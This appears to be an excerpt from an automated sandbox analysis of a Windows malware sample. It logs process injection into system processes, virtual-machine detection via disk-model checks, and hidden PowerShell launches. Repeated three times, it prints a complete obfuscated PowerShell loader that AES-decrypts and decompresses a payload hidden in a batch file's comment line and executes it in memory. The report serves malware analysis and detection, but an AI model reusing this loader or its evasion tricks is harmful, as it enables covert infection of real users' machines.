Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 224138D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2310000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26504E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 224138D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26504E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 16CE5E20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2B90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 23BCC520000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 23BCC550000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1D865090000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F0520000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 199015D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CB2E610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CB2E640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 188D6710000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 29F37400000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DE3D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DFE070000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
